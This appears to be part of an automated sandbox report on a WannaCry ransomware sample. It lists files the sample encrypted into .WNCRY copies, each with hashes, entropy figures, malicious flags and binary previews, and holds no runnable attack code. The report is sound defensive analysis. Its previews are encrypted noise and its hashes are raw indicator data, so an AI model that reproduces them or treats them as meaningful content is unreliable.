                                Preview:WANACRY!......)9$]._..._...........O.?,.(..X...|e...z...Aj............;...M......,W.bg.C.8A.4.....]6..e..$..S.b..qv8..R...J6..D..)..6v.D....A..UU.<....:e0..OS..Z..5r|:......1..A...,(FU.. .o.S..[..B:O~6'....4........{.'.0..Bk$C.g.=..].rY@9.?..{.................]<.,L....&x......3...1.5.....\?....%..m...M.pX.,.........3..2.f.Oe.O .....s[.^1.........5.k6|........S`.........,.C...C....?.7,.d4....';'....x..].i...c&..f.%^..^N..h..{.a.ki.C.l..Q..q..k_nsH..7..N...y!X.C.V{..u..8..?]\...E......)5.L..........6..k.,......n.`.(.....[..d..Nz..\f=.[.,.=.p..J5j.F..C.)..TY.JA.].g38.....,.{.p.,.....9.<..I....\Y{#W.........W..\B..P.$#.d.&W^.7&..e..&....-{.."..r..S..4C.C_.]..Ve..y..*.t..(...{..9..qY.uB..u...Ko..(...@H.Y>&f0i.a....1C..$..p.@..$.......9..`~.......[.." ..:...U. !...5.C.......Y...)]..&"6'..:V..p.s.....\...i.b.@.J...E.DC-.o|..! ..g......D.w..j3.P......0..#..o- ....;..c.m.........=....(..*......9..$Fy....[....(..{...r~.l.Y..x.6

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_29[1].txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):17736
                                Entropy (8bit):7.988540576660658
                                Encrypted:false
                                SSDEEP:384:glmskKnYWeQGDYKqDio5m0RlHMCzwSzVx9y6a2CojO:gekkpjqD/mypzzx9y3Y6
                                MD5:345E6A36EA4025A3082906F7F9AB8FC3
                                SHA1:E510FD4488D5EF2F24E21AEDCE7296B51E84F7A3
                                SHA-256:D99E2AF89B0AE22D623EDB8F4222680C4C4BA269CF8F8BD49A5E9CAF6D8103AF
                                SHA-512:17922FC8325D2BCE0183B592E83D79994FC3398B294AEEB887351A82F08F928FD850E22B193D916E595C239396523F02AE45A768C8FF8CD8C59C365682FA2DEE
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.........\.._..q.68......c.l..X..,.=n....(.\.<F@.?....:.]s.V......f..Tp.6....g.1.Kf..3c.O....B....n....cQ........(`.6.?.4.>.}...."E.d.|..[l..l...5....)v&..L.Hez=0.N4\Pz..0=..B...............(T..J);L.....Z......?.6..{..s..?-..~...!..=.u........(D......@.S.7..(...;M...Y.016+_..@?.......L@>.p......{t..o/....=..;Eil...n?.L.~....z!.=.w....V.[t.....3.l*......U.u.Q....p.B.".K-0.+..b.....7....H.Z=...N.7..".B.RB..SVF`_...f!0.%.^...Y..K~....,Z<......X%dWmA_V..@g.y...T."..'..q.........)^..~........0..#....E#.B.5.].>Y..o.o.....Hw..CI.u..TM.hR.......7.h.[..9dO7...x_...5;.U.........:7..1...z~..ot..?#VN......_.L-..Z.;....r1!.fs...6...iF.-.]}..3..|.....Y...s.......48.,%(99..1t....B^..,y8U.O...O...A..r.."..._.....c.....}....R.6.zK....z...r].K.eb.....C...-BLg.o..`k....5v..._...=>A....J........gk(...'....&......11@....2Ob..*......3<..h....!./..^...G.;...S=..8......^.<8#...@g.s.l..B."...|........I.R^.......".9.L..^[....q......;....

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_2[1].txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):73912
                                Entropy (8bit):7.997339375274032
                                Encrypted:true
                                SSDEEP:1536:M4m9jKp+mL2To5/4ZFOVwsVL85eQ9hANFddPl8:dSjzmOo5/4bYwsWc4hALP+
                                MD5:002F9474F6B144D511043CABF1EFB29B
                                SHA1:4037FB94EFF17EC26C4C956A152F57CE332EAA28
                                SHA-256:8457F673460CB4965856E531BEB643E603D2B7D2DF095CD59CCFFA3D29E7C698
                                SHA-512:042509C7434A8B003D78532164202D8A34B86E49E4B7E713E59CD76EECC32CA21110841DABE94135362BE7B6FFB6B7F03810658401A54D28E7387FD538FB7E0A
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....I...2GA..~...y. ...v....{$....-Zh!g....E!...(..d..r..R.....j{..A}..Faxs.[.....m.C..wb.=o...P..6.]..f.rNau.A.g..:.x}....U^j.J:.....*S..i...+.....G,.s\.0."...W.=..s\..}.s..... <.4..!._...Sur..].@M.5=..7w....F..,s.,...."...O...:.....)..Kof.S.".............z(.....E...t..^.b}......O...i...{.H.).I_.J. .<...Y.....e.F....../..".|.h.?^jp..=1m..c.1.$.V.Y...m#YP....Q...U=.7...{'..oG.Qj.g.,...8.Z..E..)...$|y..,....(..<....._A.!.hv.-,QX..:...nx._..<..._?....S.-3.....t.Sj.!6(..d.P\q../5.......k..8mI.....v.....m...:....LT.......q.I./..>mQ..K.X./.Pw..p.........K...E2..3..ct....#ti.......^...z..z..B+.N.....y...._........<.I/I.[..;..:Z.{..DY...[.V..Q.t...W..u..n...7.....13I?7S....RN..\..]g.T.........`i'+?...@.;{.K$T.t.,..R...2.Q.$^M1'..G..{G.IR..w.....xr..&./p...RI..E.d.. . ...I.1h.!...w.[.qr.......7..x.F...Kqq.u+....Rc......7@q....m..z.NW.O)|.A.}....\.<..U..r...I......3...P0q.....=u'.;0pk:....B.%..].<..P.....Z...x[aV.p.5.;....g.4..B..0j.D

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_3[1].txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):19336
                                Entropy (8bit):7.989886519735407
                                Encrypted:false
                                SSDEEP:384:ht7hUBeyWBTPMWC3otDzkVjo9JogsgILrnq0jT1A1PNOI8SQMDK:hdmBQJzCizkVjo0iUrq0jTi1P58QG
                                MD5:3639642B7094483ABCB4DBCA2BEDDAD1
                                SHA1:9B85592C282A291358E3A0C6CB99B5177B7A2F9A
                                SHA-256:FFB228408E056F76C40229F00C07CC0FD4DC4DA1F0AEACA2EDC4F21058494DA5
                                SHA-512:F9E62BB4235A7D341A5AB8A097A0D5EA0D869BE700D14598012AB1F4BD4897BC72F9C518F424D4FD03C5C1D4841A1062F7967B9CD1544CDC56E7ACBB18C58B5D
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......v.......i......K....6..Z.m.0S...J^E'.M.E..u..[...p....Ro'.:b..X.L`..m......?.Xn:.k...,....g.....D.GN.Hd.D;Q....R..~!^.>.g..! ..!.AR.Dk*=+O.4.8xN.b <~`..Cj...1:H..:.h.....g6..~......h.....#.h.6...;3Tz.0~.-K.Q)...2n.YXvXM.N2S....{o..3.,.Q......c....pJ.......;...w...s)........+P."..9~.>...U.d.7.b..j.S/)+..~f.....J...<t..(....;$.lfJ...,[.....|........'P,....s.p....9.Z........_..... .......`....S..>.l.B...?..LF}N..hF.kD.3.:..L..n.}...z..M.r.h........8..........?..3.....[j.Z_0...Ne........3...<...Z"[.......)..4'....Gm.R..q.n..?.{.....Y..f..(#\7........hl,]W.t_1)B[..{...|.NnB..02....(.......9..n..........N}......>..6.@..cG.....T....B.l..^IP\+.....t.....c.....E"?..^...fc..Z....M......N.5$.Cc~..g....&\v.O....].....O..o|4J...yj..;.bD_.RX.E.(5W2.]t.@XG..n&}%3}^...\#H..i/......m.e.x..k.f&S.`m$6.......&NWD.......?o...Ej...{.:.j..I..DI.E...F~mC.:).....D.2.W~3-.}...e5"%B.t.J.._.=e.6..W.P......9.c..."...".H.U...n..oT&AE.y..!V^@..k...-..P(.......

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_4[1].txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):20680
                                Entropy (8bit):7.991114500397896
                                Encrypted:true
                                SSDEEP:384:6fF373w5y7p4sq7x0LqOVtFN8BQc6kB9fiJO5+xyX1J95utPa:6fB72y7p4sI4DrrkB9QO57X0a
                                MD5:271076DC28DC047D275E9623D49FA40E
                                SHA1:364F0250867D605D2E180ED7A07FC5BA2161F80D
                                SHA-256:12A1E23BCF821BEF4F37A3E8C4A78604EC3AE8F38C1BE31F574E114413406AF7
                                SHA-512:AEB9DAFEE92D3DBD875613AD1A56EBA9669453A9D6AC375508B04250C97FC2C148EEC8CBF117CFB78EAA10B9A00F1C036606F45A5DBAC653AC2DEE70EC6206F3
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....,..T....^LmX.8.....P..-<.k.V....X9..C...J..<.r..Y........|..l?.p...]..)..2>..G{..?.jV.2.&.7..8.*'....S...u.....j.7..(y....o.98..........."."..2.2.........H.......:Xf.a(.c..,^.....Pv[..{......8..q....O.....*k.=.'....W.N..$..z..'.^....H.w[.........O........q.2.eF.-.}.[.>..Y.}@...8.gF.."...0....c.z... ...;o.jC...R.j...!M?...{O....!...j$....*..?..^. ...g.>a..]u..^.?.C.q..~..>7..d.6..r.3A....?.Cg.T..*.gx&g...n..A.........H.d3..vb..j...P.3.n..uo.0[.;.....U.y...:.L^.....w..y\H.q..c.....q.._)...B..H.T......."..$......|..,..+5...FQ.....gQ......'6.....q.w..#.f....f%_...a.[_.2...Q....E.A.C._.....$........\1-...X.}.9.b..b..<._4.:......&.l.M>.5$;"..^y....ya.Ti.b,.....8N.2cl>..4..~.<d....^.H.A.+3...:K+5.\...m.5.Uz..|..IL..&...MGX.]....'"]QZ.M?M[...'....?{6c0...$E.f........!(.?.V.[....K.d..cX....p.W..@3..rQ.G.O..mT.@<%q.C..Ul..#.BN./..p...b..)....t.`.'..D.4,m.i...C.g......\Y..r.t.'7..1lq.0.....^...........C.,............Bc...j2.j.....%.~8.7

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_5[1].txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1608
                                Entropy (8bit):7.870503596825595
                                Encrypted:false
                                SSDEEP:48:bkwaL9rLGB/xzbtv6/LoLYpehSjgAkCaIFl7zJvIYabSmn:owaJmzs8Epey1auXJv9On
                                MD5:91BAFB1B719F870F604AE8E7E0A00222
                                SHA1:6D0F152CEBB7D740872258A6EC63A62C7B6ABABE
                                SHA-256:A7BF26DB8A17EA844D5FB0E2D024559A8185C738E85E9A65189BF0E08C1A0DB4
                                SHA-512:151E850AA29A5EAC4C711B44D2115D1C838C70331E4D22798480C9B5963CE3539258D927A6290D814AD617F43A9999A349698776C90B3624A3EA28F737F654D1
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....;X.E4..\...$%.{..d.......T.y.vS...]...?A.......S.N...k.9.G...i%...i.6V....q.d.....t+.hy.q.....6YR.P.~Z.L.[.1_H{!J|.E...!.}`...X..{ L.Dk..'..+K.k.*>.N.F.].../..].Y.h.mV?n.....K.......#.`..;..Z..T.j....[.*.../..Z.:M.Rv..6.sD....(...[n:..aL..cG......$........l.,..w^9t.-.l..&.+..'n.....G...:U...Q..^..4........5y..0a=...#p.U..8%. .~.KM v......-K@.5>...KS_..5..viU._...\.t?....t..n..~%Y.N)..X:....&.^8%.SK|....U......i.......k..K3.Q.X..vo..,..7..3..1....F.[.n.5......x.*....;....p.E.@>$...c.!.s..._8.....C.....N.].V.N.{..N.(N.)..I~...A...p;...A.J9b.3B.cl...X )V..{...E...QW^W...X...v8...Y.J............_m....u.......[}(........q..A.........thh........^W3..I...;...M.Eu.eVG/.$..".W........W.qA...m.%..R.. ........e..%\b.5.xs...e....._".J.:..$...J...N(~9.z.e.%..("c.e..!:..U....&..j.B`....V.=......4..$..a...s>=.@.....#..q;..W.__.....J^$&.Q..N+....t|.hS,S...@f..K..)..|......cA..p.<....j......X.N....!.1@..L.V9.w.E~..."g.......N...".Q....d%._P.~....

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_6[1].txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):37464
                                Entropy (8bit):7.994587542982609
                                Encrypted:true
                                SSDEEP:768:b9B4StTbu7V9gFVyMpEHcbz03L+Yo9Te+EVCwXY:bcmTy8FVyCE8bz03L+YN+ACwXY
                                MD5:F4938103BC30BE9C3766B94F337723CE
                                SHA1:CB447A8F7F87E305D5CB855A4605CDF2C24D0D27
                                SHA-256:C8DC3BEE97AC9A3D5E2DF9E4C7A59948A1529FBC5C7CE0DCE6C079108387ECC8
                                SHA-512:03E4948B77091860E7FC7BC4B7E85E535F8B6AE0DBA82F078135DA689ED16ABC2C5E13E212532A319BE8DA0DBD577CE39F8AD0D2432D2A5951D699DA3E1E4031
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!...."..=..^Y....Tak8oA.4.9."..p.AU..[....F...-[ }........4(....@.Ne.F.......o.2.x.T'.,..y.<.H:O.....Y....f-WeKy.m^..Rs..V.P..Q:.....~P..7.V..g...R...^.tf (dE.DS2.[.....k..V.1R?....%....#.......@.....`..5....C...rYd....po..V..N.<.o....I!.....5. .Q.u....=.............)...0+8:.o.-..w'..+...f..t.M..NGa.8)".Fq.Q#.^u-..Y'..Rh...2...b....4.V......!c.%q$~u3.......t..^....}..LX..~.-.(.j...,....R..$.}`I7%..Qh.U.,r.R.8.....^s....'..U..#U9.t.Z.b.q&P..D...J k79.[..:.j8......w....U...2..F...zW.y.......g.......:o.G2;q.b...2(..2..{TSWk..._....L^..9.Z....o<....._.$...E;UW.....>....yjC..!...0m..=.vY.....j..7..4r...3..a7S>Df)...6..T.C......~~..[..=..9gix.p..w.9.yXM.....:..q.\.x+."....U..u..'.a$n.l}..".oD..+mc.7..,F....D.'.....`..fU.-..D.{.Y_E.........C..i..e\Fi..%..uX,]..z..L.p..........W&{;5...n...1c...y....@....6^..6.Oi+...ya..)......`. .JL..hw..CLi...>...=....M)..<.@>..f..!A+<X...}..9.l.W0.......="t.../U..DY..s...-7....3..#.7...?..b$E...k

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_7[1].txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):168968
                                Entropy (8bit):7.9989785551961194
                                Encrypted:true
                                SSDEEP:3072:Jw9UXCTr630xiXDKF9v1fK6Bf7yN9deBaNncN5N81q/vp7b/9PMqR:JoUXyr6kAkdpK6dyN9kgcNX8E3Jr9PMM
                                MD5:6E943240ABD34AC785765EF07802D85C
                                SHA1:532ACAAF3872E4169ECC95BA71F51353AE4A0BE0
                                SHA-256:A2B574165772A03EA57770ADD0438C5A07A86C7036918F4CA1397B2F4A2A598A
                                SHA-512:2A706FA33409BDABC8814CC051C67F4AEC2AC12FBDA4A21F27D44F7D7CC6E149C3ABA40C2EBC431E3E0128A8C3615719AF6746510CE6C3885912592945A3F587
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......X..l.?.w.._..W..:........H<.*..V..g:......Hv...D*.>Y.{:Wbb]..j.....F.4.....H. .u.}5Vzt..2..w7'].-..UQ.....@...x...H...F\..g....iH.c.L..q....L.*yR.p... ?6..]....,\...M....V..h*.........p..T...{...i>.t......:)8".1$.dD..$a:~X..+...3.(..w..!............Q.`...@l.V....x.*.@x5.@...$....p......>.....=B.?R....._.V.?].4Z.6-......E.D.k........,.......)'..6...@34y..g.mL.n.....AE)..:..E....FI.."g......E...2...[..B....`8.6Zv....}...D>R..s1!t5...I;..M.*%..........-K...}M!.GZ(.......[X.a...5..:.'UMr...{........U..:.f`/.*......L.|.....Ii.~.FF....M......W.|.CO..?..UDP....i.v.....J.-.y9...;.J.X.vl.6...G..M.V,J.+.!......l.rA.Y,e...v].U...Y.6..2..Z.......f..: .U.D.Y._v....4....D...y..K.2y.....gh.z....K.T.b...<....?....T...c...@.X.Z..C_.....Q.gC8.,.k|.....-....,E.$...5...S..s..ij]......"...W..HN0...g.u..!...........m..#..4../.......x.h...|.<..xg..A..]I.M.....P....v...k..6..Dd.:t./&..#...Fh..T..^.M...S...IzuZ..O.o:...r.........Q./.J.4:..

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_8[1].txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):51224
                                Entropy (8bit):7.995672375915484
                                Encrypted:true
                                SSDEEP:1536:6v6OvH1VI/ubGMUBrP9x3N6jnwFsUxkY+q3:6SY1XK9BN6cFfx/r3
                                MD5:2B37747A713EFD334C93B3D16CEF456F
                                SHA1:7FA577A621C93F5A70023B7FA235E2402243DEB9
                                SHA-256:A92BDFF33DEB04071B4D1E0FD7DB647C85B2F1B7CF08C31BD6AD2E8E6EC8A268
                                SHA-512:032560553D88C47FA58BABD61F2CE66C4D5FD241F93295DC2B7902D25A24EB8AAB61526A837DCA86B445279B936EE4B25ABFD9ABAF8D003504EF228D846B90E1
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....w..j5..S..5...t$.....G....2.....`.XAo|..0..E.:.2:............7..}ip..It."..o2J..Z.PC..g.;@..8..U....8./..S.,..;Z..k..E..\ ..E].\p-.9..j.W.Hj.uO<s.J.|6.7.~........5..NP....&-V...Tx2>.d....@.....'...zU^....v7....}f.......S...7jv..j...N....5!e..H............N.....R...<Z}r.p..e.g:.V.. ..i..../Wg.T..d...tT..0+.j.c..u...)...../0.T+....i.~...fJv..W.....'...@.!^.....tW?8.`.=...V.'Kv..9.<5<$.8..t.B..s.s...O@.^17.9..E.*G...kXPg.a.....hE.kK.)..[..`..zi7u..b.OM.7`..9?..iJ.jTb#9HI....AWA.G.........Q.q.s6..f.I^............U.....P.[....1....jB.^..S..7....A.\A.......3V\.J.( ms,.....Oq.W[qS.*.....m.+r.47.m<[.GmS...o...m..1..<o|.^.....fyH|;G..T......."..Nm.N.*...&......._8.";Mx..e......,/./........!.Xo.$.*<.hfW.g,........q.7..."..d..NG...8y*i.x..6-.UDt.zE.kf..z[..!.w.N.S.$$..K.2D.a.8&b|..-.u...},Ci]...gI.K..{..r.`..Q....[L.J.....!.-p..-...}C.J.oVV..1../..a..V.._.+3..-.W.....s.c....A..W.`..hx......,..XD......7&q.}....}.|.V5jTx.......WD...5......6$.n

                                C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\AC\AppCache\PMAQH2N6\13\C__Windows_SystemApps_Microsoft.Windows.Search_cw5n1h2txyewy_cache_Desktop_9[1].txt.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):69016
                                Entropy (8bit):7.997042868526277
                                Encrypted:true
                                SSDEEP:1536:w59iwmDiTVpqmj/ZGOh1IDKwu5jxBdqH8VWIy6sY9:m9dmDwZb4OLIDvu5VBdqiWIyq
                                MD5:F411D6F1D8E15E8EC6ED3D4C760F76B8
                                SHA1:FFFE32DB8F0DA72AB8F06D0BFA6FFBF6249A63C1
                                SHA-256:43A44A5D0CC47E32F56AE156FAAE2678EC7666E0B42ED4BB8EB778440EFC89CD
                                SHA-512:AB4A7DC7B36FD6278033C6FE9886CFBF81521BE66EA936FBEB23193258E02FBDF73CEFA15FED56B6FCF40A81FA94608954874C59958B1E52955F92DC3F5FFE1E
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....]eZ).BxO@...}........HH..-n\W.tb..f......M5.2` .5.T...X.........._..z" .R.......S.OR.....@.p..]/Oa....e,..z..-,.Hy Z:'.|.]H:M=......3.s.oj&.3..22..V}..b..qi..w..J.&.....m.#...V..`.5..xp.q..p.s......5.o._...e.......1[..3.1.}.R..f%..?.%z.G.MG.....t.......;`..S]:w+..o_t........ !....l...]=..\..H..5..h..$xia..V...~.^<9b{..R.E..hF......m.\5...T$?wi.}...%.K.0....@0$).......l.I....`..*.p.r.......~.2...........:...!...w&.J.....y.u..H..N....x]N{....#D.S.[d.A..........<..S.mP....e......Iwe..\...'.g._....q.....xl.+.*y..Im.z=..u..H.C.....K..HK..-!Y.#.".F/d......I.....\ .j...C-.H6...O.....dI.~..?C...;..,..n..|.x..}j.....Q.|....l..@6.......V..\J..C.....~2s.j.......Y.... p'..;.H.{....}."Fy-0....#>u...Sx.>..0.....7S6.W.8.u...42m%.1mJV.s.{<....,.._g...*...S.x>.Qx...6\....V....F.2/... .....>'.&v.M.5'..2.?.k...>\..H..Q7t+H7...@......^`.!#..vZ.'2.]..W_.F0.7.... ..<.Q/.ca..Mw~Em..X..D.[.<N.%...h..R...s?...rx.@Mc6+:.H ^..O;~F.&.p......\lw.3'.Vt8.|m.

                                C:\Documents and Settings\user\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):47576
                                Entropy (8bit):7.996351379468486
                                Encrypted:true
                                SSDEEP:768:PIAnuiL98SeaPqel3jjy/c6xFaTJLaQ0Ux9SDNFHPA8YZP+zJst5xnkdRDysxO:AAnu+lRQUxsDNdAtP+zORniS
                                MD5:B918EC7728E524724F1CDFD950FB41F8
                                SHA1:6F8E1D5D48E13EEACE78E930AC2F951832C3CBB2
                                SHA-256:2FAD24BC329700A5368199743D33C94497D2E9377DA7FB7239A6B77B6C4EA69B
                                SHA-512:EAC79FF76430164C0115FED61D45E35E42E5DBE8F3B96A943771B54EB75A78A57B3634FE696707CF1B031D96404D02B05DDC97B75A6B4D5CE6ABE5960414D51F
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!.....w...pKi...K. ...m..v&...=..3..qMpAs*E.G..r..5X...@`.Z...D9X."R..OX..4.^..".....ecH}a.W3j.8ft...A.......e.>.X*..Qa...*...e...<@&..^..........Zo(..5...Sc........U...*C../--...t.VK.5.........]....=Q...........Cw....{O.$.:...?j..../....>?.].v.................&....a.E....>.${......p.i....C'.^...=..t.....-..H.~..K.%.T..P....G.q..~u.8.'..|Z=.F.._...9..l.mmR84%.|y.9n. u.Z..d.'....G.....C}:..\=-+.........r..'...~/*..B..<...w..d.;..l.S...PH..j.TS..?...-....K.b._q...k@^...a.'1.t..x......SFh.$....B....;...!B.Z7....`~...;...,.{.\..R=.9..M..k......E 7......Q[...@..p?p.pp....M.&..".....<.F.....L.^..t....8.|..ee..d.[7.uZ..e....U....25O.6m..k.........T.a...D..;ZF'7M:.e.......w.*.W.o.Z...n.A..!......^YT...7..#..1...X8E.....qI.m...G6.....y..v..n..R.. .Pu:...^T.Z....j..."....g....Fm......f...B5.`.4.. ...+...X.&UF...;..W./+$R..57.8.R.$V..9%n.....k.;.4.........ch...8..\1/.;.88...d.+........3..9...{`..Y............o...5.....?...*.......*...4

                                C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1024_768_POS4.jpg.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):40984
                                Entropy (8bit):7.995595406679536
                                Encrypted:true
                                SSDEEP:768:6qu5OgHQLsYLHSU857FRWjO0HG3YaqI4vw89blWR+g/i:hgHQLpLHeFsOiKB4vwwIE6i
                                MD5:FC29968C24759B854B7C57EAEFBB45B5
                                SHA1:ECC5CCAA47554B3AB01EC8FF5DD15E519C9F3A2F
                                SHA-256:F56374B89593DA2B66F37BC640896EAF73DD09BFA568087B28B8733E712943AB
                                SHA-512:B3E6694F2486C565600731B4B4EF8A46F00EEDCAD5134C4B5369838C5C2907F43A989BE71D8E8A27014E8E1D0D1A1F2A29044D6401CC3C3A42D28433BD852A04
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!......(..}z.....].t.a.V....of.Wd_?...;.OP..~.....8..<.Sp.C.....a....J.....o|a...,..N^.h. (...h.}.....,....+....y..u.+.j(.h....M........@....(.....J..v...4.{Q. ....[&.W......{..+..f:g.y\.2..Js'.\,6<......bN9D.Um..z0.7..Y_..a...a|v..G.s.\.s=S.Ii...'................=,>.h...$.F...,h.Z~.F]Lr....M........)R0i..Rh..e.P........ka<-sI,...z<...3....%%g.9.;.G....J..."Mu(l.=.../..O...a.........{.gd......L.H........Ac....'.{.(.....{?/.qt.Vp...K..<.v....g....#.|(Dzu.....p.6....r..Z>..S.V(^.EV....nx.W.f...'.8.b.a25...x...cG....d.V.......".k.;....dc..z.....B.\..`+.A..bt..N.e..Y.[.M,q{.G.]YN.....C6j..8S/..<.l..a...tY{...^%......;....\..Xx......>).HD.l.x...c.......?G*./v.p...D..:..s......H.m*.G........Ys...um.U..V..(...yS..L...s9..s....mMH....b..-.G`...l^..6..? .d.+.VA...N6r.1.....Y..{..iW..Ar.....Ip...q~.T.B.a.v.f5.@'G..@......zL.2.-..^\......"kJ........J.>..h.N.......?.$Y..<d......O..L.....:.`...."V ...[Kj..i........]....ij..K.)+.....

                                C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1920_1080_POS4.jpg.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):125288
                                Entropy (8bit):7.998553445878312
                                Encrypted:true
                                SSDEEP:3072:tE14rNsx9SzsvmgucpQ2pZyHzaBgTY6PBbtEZSLN:tEWrIksVjpQzYgnZbtV
                                MD5:07FC11CE9850703CFE71441FCAB3EA41
                                SHA1:B82DF49233927E9932AE21955FA560D3B45D2945
                                SHA-256:EA6FF0AAAD53A050E54FF471CE77DDC5C70F17866606401AED2E5F7CE4C5AC27
                                SHA-512:B28C6DB2EE79CC345ACFE5AAAF4B8A801E530FB5A8B97205C04DF122855187769D5D831F054FFEC146D6AF5458D7AD0CF6D86090F4003024D43683290F3ED48C
                                Malicious:true
                                Reputation:unknown
                                Preview:WANACRY!....f.. .A.. =.(ME..f..va._uS.)2...$..9.mP......Rp .~.%1ob/..^....I.%$...u....zL........`.. ......I]Z.k..sy..Ay...S.`._..Y.v.^..K..A...Q.........#m.&.?.+#......N.!,..#...UZ......./.......K..P...P.`..[@..]...b...x@..S^....Y...Q1.").Hr.x.......Ih.X1....D........P.<`....v.\..S.{..:...j.S..`..y,.nj..W.P..o.G.....F...|F^.i..}.p..#!94.d..&...6.....vo..:y.......m.....J.'l.t.:.Q.\o.G......r....6...".m6T.]... P..1C."./._.+8H..1. ...M..g....f"m/..}M..U.Y,.....V....o|s..$.\E@.!._..s..9.....y.Rl.eD.......2...-..,\...E............%w....k+.#.}m9kK....cv7j6....B.....-.c.+....FI>R.:.o..n.e.?.s4Oe.W!..>....+....<.08.*.6......tR.\..N4v...8...;.1.."=h...W``.q.....[5.:+U.33.R.n..L.M.e0.0#.....x.E>....b.t..fu...!..8R.v.-9W..Y.zC..J...Z.}..m..t..8....-w...K..z.=m$...m. ...].1;6c......W....9>..Q*..#..a.i...w...9..6.&.l....8.TW...G.^.L....A...MW...)..T2..U...fm,r...>x.Y..X..BB..;[..nU.K....fu1.dn+.q.....3M..J...U.I....v..Sf.. ....v.....CS..%?.......y1V

                                C:\Documents and Settings\user\Downloads\BJZFPPWAPT.jpg.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.832522092590801
                                Encrypted:false
                                SSDEEP:24:bkObMJ46FJiM0qR2BIklBTYJid9cpOiv6Y+hvY+IM2uv+osQlyN0q:bkl46FJiMJgWklBQiDcpYYyvY+AGvrUN
                                MD5:B8F6B29F78898399B73C248FCFE9E078
                                SHA1:C278B26CE2DAB6431750D2E4E479B2596D277A0F
                                SHA-256:098585C264F1EEEB90092D3F2F939378837DC80435E318B09EA86FF24B4250E5
                                SHA-512:BF1807AC66D2168EAFB92E418AEBB0A9F9C794AF5F7C49FD87AC04C4CAABE3E470D5AE232D40388527EBE2BA80D5780260D0A0CA274921507D3D482F7FE62DE4
